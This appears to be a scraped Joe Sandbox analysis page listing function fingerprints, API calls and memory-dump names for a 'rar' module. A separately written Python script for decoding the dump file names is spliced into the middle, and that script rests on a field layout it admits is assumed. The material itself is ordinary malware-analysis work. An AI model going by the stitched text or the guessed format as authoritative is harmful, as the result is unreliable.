• Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
• Instruction Fuzzy Hash: 55315936618F8196DB60CF25E8402AE73A4FB88754F500175EAAD87B99EF3CD55ACB00
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
• String ID:
• API String ID: 3398352648-0
• Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
• Instruction ID: acb44669ce05b53c62a5d24c61770dc4cb6a67e45e6ba3d8319ab381880f78db
• Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
• Instruction Fuzzy Hash: 4111843261874186E7908F25F44156BB3B4FB88BC0F544035EA9E83AA8EF3DD01ACB40
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
• String ID:
• API String ID: 3116915952-0
• Opcode ID: 3e455452d26091372e3f028aefc06a1504c9ecf714524aafa6be1edd61abc305
• Instruction ID: 17aa7daf4999c733bf0137e0e5145af988b0c7fb54d7af0a48a0a42f6ce799da
• Opcode Fuzzy Hash: 3e455452d26091372e3f028aefc06a1504c9ecf714524aafa6be1edd61abc305
• Instruction Fuzzy Hash: 6FE18622A18A8682EB20DF26D4505FD63A5FF85784F4540B2DE6D877D6EE3CD51BC700
APIs
• CreateFileW.KERNEL32(?,?,?,00007FF6FAA411B0,?,?,?,00000000,?,?,00007FF6FAA3F30F,00000000,00007FF6FAA26380,?,00007FF6FAA22EC8), ref: 00007FF6FAA43AC4
• CreateFileW.KERNEL32(?,?,?,00007FF6FAA411B0,?,?,?,00000000,?,?,00007FF6FAA3F30F,00000000,00007FF6FAA26380,?,00007FF6FAA22EC8), ref: 00007FF6FAA43B0A
• DeviceIoControl.KERNEL32 ref: 00007FF6FAA43B55
• CloseHandle.KERNEL32(?,?,?,00007FF6FAA411B0,?,?,?,00000000,?,?,00007FF6FAA3F30F,00000000,00007FF6FAA26380,?,00007FF6FAA22EC8), ref: 00007FF6FAA43B60
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 998109204-0
                                                                                                                                                                                                                                • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                • Instruction ID: 8106b985007448831e7e14a42ee9f9faa3450a5ffa3c58e1e86dfe40760be2d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90317232618B8186E7608F51B44469AB7A4FB887F4F110235EEAD53BD8EF3DD55A8B00

Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID:
• String ID: CMT
• API String ID: 0-2756464174
• Opcode ID: b4ab7884751323d34667fa1b193a3ce4b166b4df9b755dd49a4274d25c618ef0
• Instruction ID: 8be619f76e39a1cad9e14080c3e766096d2dacf26fda80d0df70dd49fa8257a2
• Opcode Fuzzy Hash: b4ab7884751323d34667fa1b193a3ce4b166b4df9b755dd49a4274d25c618ef0
• Instruction Fuzzy Hash: 9BD1B462A1858281EB25DF26D8501BD63E1FF89B80F4445B2EA6E877D5EF3CF55AC300

APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAA88704
  • Part of subcall function 00007FF6FAA84E3C: GetCurrentProcess.KERNEL32(00007FF6FAA89CC5), ref: 00007FF6FAA84E69
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CurrentProcess_invalid_parameter_noinfo
• String ID: *?$.
• API String ID: 2518042432-3972193922
• Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
• Instruction ID: ca8376698f5876f27bc1f5c81bf8fb11261c3e6f8b993da61f0b2779fd131374
• Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
• Instruction Fuzzy Hash: A151C162F19AD585EB10DFA298004BD67A5FB48BD8B4445B1DE6D97BC9EF3CE04A8300

APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
• Instruction ID: f1b560dd59d50d534cfbcc58d97ccee22c5305b13dd6cdae71aee0d959bd287c
• Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
• Instruction Fuzzy Hash: 7E112B72B146419EEB108FB5E4912AE7BB0FB48748F40153ADA9E93B58EF3CD159CB00

Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                                                                • Opcode ID: 85306a6c608a838791490c1dd49bdcdd65edd45efc0d28b7ac5077cdbaf18d29
                                                                                                                                                                                                                                • Instruction ID: 41a1ad6b5b042b172ef8eb990828fe02aa6f5863a1fba8ea2b6925692293b2b7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85306a6c608a838791490c1dd49bdcdd65edd45efc0d28b7ac5077cdbaf18d29
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E31E922B186D145EB209E3298047AABB91BB89BE4F048371DE7C87BC5EE3CD5178700
                                                                                                                                                                                                                                APIs
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
• Instruction ID: d6bb0b82a8dcf4fa041978fa53ab56b1735fe5f2176fbb0d50675424101fca7c
• Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
• Instruction Fuzzy Hash: 55F0893170C74183E3108F17B44111BA7A8FB89BD4F048174EA9993B98DF7CC5568700
APIs
Similarity
• API ID: Time$System$File
• String ID:
• API String ID: 2838179519-0
• Opcode ID: 28ee689204bca22ca7f0ae273eeb0c3bf9f998676d3510b58b83d2159759f543
• Instruction ID: e544cb7b934f46771aa5e59051a21e6d7b109685d8b5d261dbfffe30db176e61
• Opcode Fuzzy Hash: 28ee689204bca22ca7f0ae273eeb0c3bf9f998676d3510b58b83d2159759f543
• Instruction Fuzzy Hash: D0E03962618A4181EF519F10F89116AB360FBA8788F441122E69E876A8EE2CD25ACB00
APIs
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
• Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
• Instruction ID: 4385df8a7675e1835e4df88cd2ad30de46084f58b3311cb698b63089641c2b87
• Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
• Instruction Fuzzy Hash: D3014C7262868187EB70DB19E4413ABB3A1FB88744F900171F69CC2698EF3CD64ACF50
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 70d3c2c663c2eec3c7abe55d9b20e9285272005f266212ac2cd176c9e927fba8
• Instruction ID: 2122fab8135ced3fb58c56ea9106470697df3c8016b584ce3bed355a9960b487
• Opcode Fuzzy Hash: 70d3c2c663c2eec3c7abe55d9b20e9285272005f266212ac2cd176c9e927fba8
• Instruction Fuzzy Hash: D2B09220E07B42C2EB882B216C8622423A47F48700F8801B8C55D90360EF2D60BA9700
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
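The dump names listed under "Memory Dump Source" encode which process, address and page protection each dump came from, which is what an analyst needs to pick the executable region of the rar module out of the set. The following is an added example, not part of the Joe Sandbox report: it parses the dump names copied from the record above and decodes the protection and region-type fields with the Windows winnt.h constants. The field layout (pid, pass, id, address, protection, sixth field, region type, module index) is an assumption; the pid and pass values are consistent with the snapshot name hcaresult_109_2_7ff6faa20000_rar.jbxd on the page (0x6D = 109), and the protection values line up with a PE layout (headers read-only at the base, executable text at base+0x1000, writable data above it). The sixth field is kept raw because its meaning is not stated on the page.

```python
"""Decode Joe Sandbox .sdmp file names (added example; field layout is assumed)."""
import re
from dataclasses import dataclass

# Page protection constants from winnt.h (authoritative Windows values).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Region type constants from winnt.h.
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Assumed layout: <pid>.<pass>.<id>.<address>.<protect>.<field6>.<type>.<index>.sdmp
# pid/pass match the snapshot name on the page; field6 is of unknown meaning.
DUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<pass>[0-9A-F]{8})\.(?P<id>\d+)\."
    r"(?P<address>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<field6>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<index>[0-9A-F]{8})\.sdmp$"
)


@dataclass
class DumpRegion:
    pid: int
    address: int
    protect: int
    mem_type: int
    index: int
    raw: str

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        # Every PAGE_EXECUTE* value lives in the 0x10..0x80 nibble.
        return (self.protect & 0xF0) != 0


def parse_dump_name(name: str) -> DumpRegion:
    """Split one .sdmp file name into its numeric fields."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    return DumpRegion(
        pid=int(m["pid"], 16),
        address=int(m["address"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["type"], 16),
        index=int(m["index"], 16),
        raw=name,
    )


def code_regions(names, image_base: int):
    """Executable MEM_IMAGE regions at or above image_base: the dumps worth disassembling."""
    regions = [parse_dump_name(n) for n in names]
    return [r for r in regions
            if r.executable and r.mem_type == MEM_IMAGE and r.address >= image_base]


# Dump names copied from the record above (rar module in PID 0x6D = 109).
REPORT_DUMPS = [
    "0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp",
    "0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp",
]
IMAGE_BASE = 0x7FF6FAA20000  # "Offset" value given in the record above

if __name__ == "__main__":
    for r in (parse_dump_name(n) for n in REPORT_DUMPS):
        print(f"pid={r.pid} {r.address:#x} {r.protect_name:<22} {r.type_name}")
    print("code regions:", [f"{r.address:#x}" for r in code_regions(REPORT_DUMPS, IMAGE_BASE)])
```

Run as a script it lists the five regions and reports only the dump at 0x7ff6faa21000 as code, which is the "Source File" the function fingerprints in this section were taken from; the read-only dump at the image base holds the PE headers and the PAGE_READWRITE / PAGE_WRITECOPY dumps above it hold data.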
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8f9fe6a0e708da395deaa9719d2eaf30e970c7ef7031061cc4a3703374185ea3
• Instruction ID: 5aad7cbdfa77e078a8c66c11835b064122f8391aea7249b1e236eeabaff23d82
• Opcode Fuzzy Hash: 8f9fe6a0e708da395deaa9719d2eaf30e970c7ef7031061cc4a3703374185ea3
• Instruction Fuzzy Hash: DDF06871B192958AEB948F28A40262977E0F718380F40807AE59DC3B44DB3CD0659F04
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e2ce7112df4d35fd3721b6807b6281889e1b5803173610b7745d5ca91cf06b82
• Instruction ID: 870fd44137c12f8b92eb975cb7dd43cac9059f3a1923c05047cb99260d3817c8
• Opcode Fuzzy Hash: e2ce7112df4d35fd3721b6807b6281889e1b5803173610b7745d5ca91cf06b82
• Instruction Fuzzy Hash: C8A00162908A06D5E784AF01E9504326224AB54744B4005B1D16E810E8AE3DA55AC240
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
• API String ID: 3215553584-2617248754
• Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
• Instruction ID: 42fafcd89e9db0e74c2bb0dae81881d5ee7becb6dce539a1eab8f387bfe953e5
• Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
• Instruction Fuzzy Hash: 0241A172A09B8589F704CF65E8417DD37A4EB08398F0055B6EE6C87B99EE3DD02AC344
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Console$Mode$Handle$Readfflush
• String ID:
• API String ID: 1039280553-0
• Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
• Instruction ID: 95632c6fd794e1a53098537790a588c005d4aba691ecfd7d7ad605a607bfc947
• Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
• Instruction Fuzzy Hash: C4218626A1864297EB009F25A90053A6365FB89BD1F540270EE6A537A8EE3DE55BC700
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 932687459-0
                                                                                                                                                                                                                                • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                                • Instruction ID: c0fd2462ddbb3faf3a3df9d65245f371444c84e3a66d35a8453ee7da6e01475e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C81B362A0DA8286EB61DA11E4403BB6391EB44B94F184171DB6DC7BDDEF3CE95B8340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
